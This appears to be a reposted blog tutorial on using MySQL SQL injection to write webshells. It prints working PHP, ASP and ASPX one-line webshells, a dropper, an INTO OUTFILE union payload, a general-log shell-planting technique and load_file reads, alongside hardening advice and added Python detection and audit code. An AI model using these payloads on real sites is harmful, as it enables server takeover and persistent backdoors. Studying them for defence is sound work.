
SQL injection: uploading a one-sentence Trojan (repost)

2022-06-12 04:33:00 hanzhen668

Reposted from "Exploiting SQL injection to upload a one-sentence Trojan", Buffedon's blog on CSDN (tags: sqlmap, uploading a Trojan)

I think it is well written, so I am reposting it so that more people can learn from it.

Exploiting SQL injection to upload a one-sentence Trojan

Overview

This article mainly introduces how an SQL injection vulnerability can be used to write (upload) files. To upload a file through SQL injection we need to know:

  1. The path on the web server where the uploaded page will live
  2. What permissions the upload requires, that is, the prerequisites
  3. What to put in the uploaded file, that is, how a Trojan program is written
  4. What harm the upload does to the server, and how to protect against it

1. Hazards of SQL injection

  1. Obtaining data: reading the database, reading system files
  2. File operations
  3. Executing system commands
  4. Modifying the registry

2. File writing

Master how to write a shell with the write functions (INTO OUTFILE / INTO DUMPFILE)

Master how to write a shell through the log file

The focus is file writing and downloading

2.1 webshell, one-sentence Trojans, backdoors

Personal understanding
A webshell is a code execution environment in the form of a web page file (asp, php, jsp or cgi), used mainly for website management, server management, permission management and similar tasks. It is convenient: upload one code file, visit it through the website, and many routine operations can be carried out, which greatly simplifies managing the website and server. Precisely because of this, a small number of people use modified versions of such code as backdoors in order to control the web server.

For webmasters, a webshell is a tool for managing the server and system permissions.

  1. For an attacker, uploading the Trojan file is the process of getting a shell (getshell).
  2. Once the attacker's uploaded payload executes successfully, the website's back-end directory becomes visible and the attacker can control the web server and its privileges; this is the process of getting a webshell.
  3. After the payload has been uploaded, later access uses tools such as Cknife or AntSword to connect directly to the website and control the back end, producing a sustained attack; this is the process of leaving a backdoor.

webshell (the full-featured "big Trojan")

A webshell is a command execution environment in the form of a web file (asp, aspx, php, jsp or cgi); it can also be called a web backdoor.

After breaking into a website, an intruder usually mixes asp, aspx, php or jsp backdoor files in with the normal page files in the web server's directory, then accesses the backdoor file with a browser to obtain a command execution environment and thereby control the web server.

As the name suggests, "web" implies that the server must be running a web service, and "shell" means obtaining some degree of operating permission on the server. A webshell usually refers to the degree of operating permission an intruder gains on the web server through the website's port. Because webshells mostly take the form of dynamic scripts, they are also known as website backdoor tools.

On the other hand, webshells are often used by webmasters for website management, server management and so on. Depending on the FSO (FileSystemObject) permissions available, their functions include editing web scripts online, uploading and downloading files, viewing the database, executing arbitrary program commands, and more.

One-sentence Trojans

A one-sentence Trojan is a way of obtaining a webshell by submitting a short piece of code to the server so that the Trojan is inserted into the server.

A one-sentence Trojan can also be combined with an SQL injection vulnerability: using an injection that echoes output, write the one-sentence Trojan into the web root.

PHP one-sentence Trojan:  <?php @eval($_POST[value]); ?>    // @ suppresses errors, so execution continues even if an error is raised
ASP one-sentence Trojan:  <%eval request ("value")%>  or  <% execute(request("value")) %>
ASPX one-sentence Trojan: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 // eval and execute take the content that follows and execute it as code

<?php fputs( fopen('xie.php','w') , '<?php eval($_POST[xie]) ?>' ) ; ?>
 Creates the file xie.php in the current directory and writes the one-sentence Trojan into xie.php

Conditions for a one-sentence Trojan to execute successfully

  1. The Trojan is uploaded successfully and not intercepted
  2. The attacker can find the page's directory, that is, knows the path of the Trojan
  3. The uploaded Trojan file can be executed by the web server

Harm done by the Trojan file

  1. Sensitive data on the infected host can be obtained
  2. System resources such as CPU are consumed, possibly leading to system failure
  3. Passwords on the infected host are changed, files deleted, the registry modified
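A defender-side check for the one-sentence Trojan forms quoted above, added here as an example that is not part of the original post: it scans a constructed set of web-root files for the eval-of-request-parameter pattern (PHP, ASP, ASPX) and for the PHP dropper that writes such a file, reporting file, signature and line. The SIGNATURES table, the function names and SAMPLE_FILES are assumptions constructed for this example.

```python
import re

# Signatures for the one-sentence webshell forms quoted above (PHP, ASP, ASPX)
# and for the PHP dropper that writes such a file. Constructed for this example;
# a real scanner also has to handle obfuscated variants.
SIGNATURES = {
    "php_eval_request": re.compile(
        r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE),
    "php_dropper": re.compile(
        r"\bfputs\s*\(\s*fopen\s*\([^)]*,\s*['\"]w['\"]\s*\)", re.IGNORECASE),
    "asp_eval_request": re.compile(
        r"<%\s*(eval|execute)\s*\(?\s*request\s*\(", re.IGNORECASE),
    "aspx_eval_request": re.compile(
        r"\beval\s*\(\s*Request\.Item\s*\[", re.IGNORECASE),
}

def scan_source(name, text):
    """Return (file name, signature, line number) for every signature hit in one file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for sig, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((name, sig, lineno))
    return hits

def scan_files(files):
    """files maps file name -> contents (e.g. read from the web root). Returns all hits."""
    hits = []
    for name, text in files.items():
        hits.extend(scan_source(name, text))
    return hits

# Constructed sample web root: one benign script plus the forms shown in this article.
# 1.php mimics a file written with INTO OUTFILE (the union row's other columns remain).
SAMPLE_FILES = {
    "index.php": "<?php\n$id = (int)($_GET['id'] ?? 0);\necho \"item $id\";\n",
    "1.php": "1\t<?php eval($_POST['aaa']);?>\t3\n",
    "xie.php": "<?php @eval($_POST[value]); ?>\n",
    "cmd.asp": '<%eval request ("value")%>\n',
    "cmd.aspx": '<%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>\n',
    "dropper.php": "<?php fputs( fopen('xie.php','w') , '<?php eval($_POST[xie]) ?>' ) ; ?>\n",
}

if __name__ == "__main__":
    for name, sig, lineno in scan_files(SAMPLE_FILES):
        print(f"{name}:{lineno}: {sig}")
```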

2.2 Prerequisites for file writing

  1. The absolute path of the website is known (how to find it is covered in 2.4)
  2. The MySQL service has write permission: folder permissions, file permissions and user permissions all allow it
  3. secure_file_priv='' (an empty value places no directory restriction on writing or exporting files; with phpstudy, add this line to my.ini)
  4. The MySQL user the application connects with has the FILE privilege
  5. The SQL statement is not escaped (quotes survive into the query)

2.3 Write functions

INTO OUTFILE and INTO DUMPFILE

select * from user into outfile "d:\\1.php"
select * from user into dumpfile "d:\\1.php"
show variables like '%secure%'    // view the current value of secure-file-priv

2.4 How to find the website root directory (absolute path)

The file must be written into the website's root directory, otherwise it cannot be executed.

  1. From leaked information

    For example, requesting a URL such as 127.0.0.1/123.php

  2. Manually triggering error messages

    The path may appear in the response

  3. From experience: knowledge of the default directory layouts of Apache, Linux and IIS

2.5 Can only be combined with injection that echoes output

id=-1' union select 1,"<?php eval($_POST['aaa']);?>",3 
into OUTFILE 'd:\\1.php' --+
-- sqli-labs less-1 as the example

Then open the D drive and find that 1.php was written successfully.

Testing showed that combining file writing with error-based injection or blind injection does not give the desired result.

Therefore error-based injection and blind injection cannot be used to upload files to the server.

2.6 Writing a file through the log

Logs are files too, so a one-sentence Trojan can be written into the log.

  1. First check the log settings and enable the general query log

     show variables like '%general%'          // view the general log settings
     set GLOBAL general_log=1                 // enable the general query log
     set GLOBAL general_log_file='d:\\path'   // change the log file location

  2. Every query statement is recorded in the general log (LAPTOP-NDINB3J0.log, named after the host by default), so first change the log file location, then write the Trojan into this file

Key points: know the path of the root directory, and the statement must actually be executed

2.7 File reading

Prerequisites

  1. The absolute path of the file to read is known
  2. The MySQL service has read permission on that path
  3. The MySQL user the application connects with has the FILE privilege
  4. secure_file_priv=''

Read function

  1. The data-reading function load_file('<absolute path>')

     select load_file('d:\\1.php')

2.8 Protection against file writing

  1. Minimize permissions

    For example: set secure-file-priv; on Linux, set the read / write / execute permissions of the directories

  2. Minimize functionality: close ports you do not need

    For example the ftp and telnet ports

  3. Minimize services

  4. Add filtering

  5. Use prepared statements (precompiled SQL)
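An audit of the prerequisites listed in 2.2 and 2.6 against the hardening in 2.8, added here as an example that is not part of the original post: it parses constructed SHOW VARIABLES and SHOW GRANTS output and reports which attacker prerequisites still hold (empty secure_file_priv, general log enabled or placed under the web root, FILE privilege on the application account). The names WEAK_*, HARDENED_*, WEB_ROOT and the account web@localhost are assumptions; it goes slightly beyond the text by also checking the application account's global grants.

```python
import re

def parse_variables(text):
    """Parse tab-separated `SHOW VARIABLES` output (header row, then name<TAB>value rows)."""
    variables = {}
    for line in text.splitlines()[1:]:
        name, sep, value = line.partition("\t")
        if sep:
            variables[name.strip()] = value.strip()
    return variables

def global_privileges(grants_text):
    """Collect privileges granted on *.* (global scope) from `SHOW GRANTS` output."""
    privs = set()
    for line in grants_text.splitlines():
        m = re.match(r"GRANT (.+?) ON \*\.\* TO ", line)
        if m:
            privs.update(p.strip().upper() for p in m.group(1).split(","))
    return privs

def _norm(path):
    return path.replace("\\", "/").rstrip("/").lower()

def audit(variables, grants_text, web_root):
    """Return a finding for each attacker prerequisite from 2.2 and 2.6 that still holds."""
    findings = []
    if variables.get("secure_file_priv", "NULL") == "":
        findings.append("secure_file_priv is empty: OUTFILE/LOAD_FILE may use any path")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: injected queries are written to disk")
        if _norm(variables.get("general_log_file", "")).startswith(_norm(web_root) + "/"):
            findings.append("general_log_file is under the web root: log is served as a page")
    privs = global_privileges(grants_text)
    if "FILE" in privs or "ALL PRIVILEGES" in privs:
        findings.append("application account holds FILE: file read/write via SQL")
    return findings

# Constructed sample output for the weak setup this article relies on ...
WEAK_VARIABLES = "Variable_name\tValue\ngeneral_log\tON\n" \
    "general_log_file\tC:\\phpstudy\\WWW\\LAPTOP-NDINB3J0.log\nsecure_file_priv\t\n"
WEAK_GRANTS = "Grants for web@localhost\nGRANT FILE ON *.* TO `web`@`localhost`\n" \
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `app`.* TO `web`@`localhost`\n"
# ... and after hardening: file access disabled (NULL), logging off, no FILE privilege.
HARDENED_VARIABLES = "Variable_name\tValue\ngeneral_log\tOFF\n" \
    "general_log_file\tC:\\phpstudy\\logs\\mysql.log\nsecure_file_priv\tNULL\n"
HARDENED_GRANTS = "Grants for web@localhost\nGRANT USAGE ON *.* TO `web`@`localhost`\n" \
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `app`.* TO `web`@`localhost`\n"
WEB_ROOT = "C:\\phpstudy\\WWW"
```

Running `audit(parse_variables(WEAK_VARIABLES), WEAK_GRANTS, WEB_ROOT)` yields four findings, while the hardened pair yields none.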


Copyright notice
This article was written by [hanzhen668]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/163/202206120428173419.html